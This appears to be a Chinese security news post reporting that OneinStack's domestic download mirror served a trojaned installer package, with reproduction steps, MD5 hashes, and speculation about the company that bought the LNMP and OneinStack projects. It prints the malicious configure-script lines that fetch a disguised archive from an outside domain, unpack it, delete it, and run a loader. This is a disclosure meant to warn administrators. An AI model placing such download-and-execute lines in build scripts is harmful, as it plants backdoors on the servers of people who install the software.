「情报泄露」Oneinstack国内下载源遭到挂马 | 众站长需引起重视插图

早前蓝点网提到国内安全公司发现 LNMP 一键安装包出现后门程序,原本大家以为是服务器被黑了。

在 lnmp 一键安装包官网,至今没有发布关于这个安全事件的公告,而且网站也变更为金华市矜贵网络科技有限公司 (下称金华矜贵),金华矜贵还是另一个 Linux 面板 WDCP 的所有者。

值得注意的是,国内的另一款 Linux 面板 oneinstack 目前也挂上了金华矜贵的备案号,这说明金华矜贵已经买下了 lnmp 一键安装包和 oneinstack。

另外该公司还准备买下秋水逸冰的 lamp 一键安装包 (lamp[.]sh),不过已经被秋大拒绝。

所以这一下子买下国内过个规模不算特别大的 Linux 面板,金华矜贵的目的看起来是要做个能与宝塔面板抗衡的新面板?只不过购买这些面板只是相当于买下习惯使用这些面板的用户,后面是否会开发一个新面板就是个问题了。

复现步骤

(从海外节点下载暂未发现有此问题)

  1. 检查 mirrors.oneinstack.com 是否 CNAME 到 seo-one-01.xnsksstack.com,这个域名的 DNS 为 DNSPod ,国内解析为 CNAME mirrors.oneinstack.com.w.cdngslb.com
  2. 对于阿里云 CDN(含恶意代码),海外解析为 A 记录 47.251.13.6(阿里云美国单点)。
  3. 对于国内机器或手动指定 mirrors.oneinstack.com.w.cdngslb.com 的国内 IP。
「情报泄露」Oneinstack国内下载源遭到挂马 | 众站长需引起重视插图1

复现命令

wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz
tar -xzf oneinstack-full.tar.gz
cd oneinstack/src
tar -xzf pcre-8.45.tar.gz
cd pcre-8.45
grep -r "oneinstack.club" pcre-8.45

复现结果

pcre-8.45/configure  6883 行:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

验证 MD5

  • 恶意包:md5sum oneinstack-full.tar.gz 结果为 3dc788dd9fe0c13e3db1411e53932331
  • 海外节点包(暂未发现有此问题):aa55626f6ba9eb8cae2f5a3d9c6c9b96

国内国外包对比(右边海外左边国内):

「情报泄露」Oneinstack国内下载源遭到挂马 | 众站长需引起重视插图2
「情报泄露」Oneinstack国内下载源遭到挂马 | 众站长需引起重视插图3
root@ersanwu-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/
/root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
/root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE

lnmp.org 和半年前的 Oneinstack 挂马(GitHub)一样。

恶意域名 oneinstack.club 注册于 2023-08-28,与 lnmp 的恶意域名 lnmp.life 的注册日期和注册商均一致。

「情报泄露」Oneinstack国内下载源遭到挂马 | 众站长需引起重视插图4

其他信息

回到文章开头的话题,买下一个一键安装包后就出现了带有后门的版本,而且到现在还不发公告,所以到底是服务器被黑还是另有隐情就不好说了。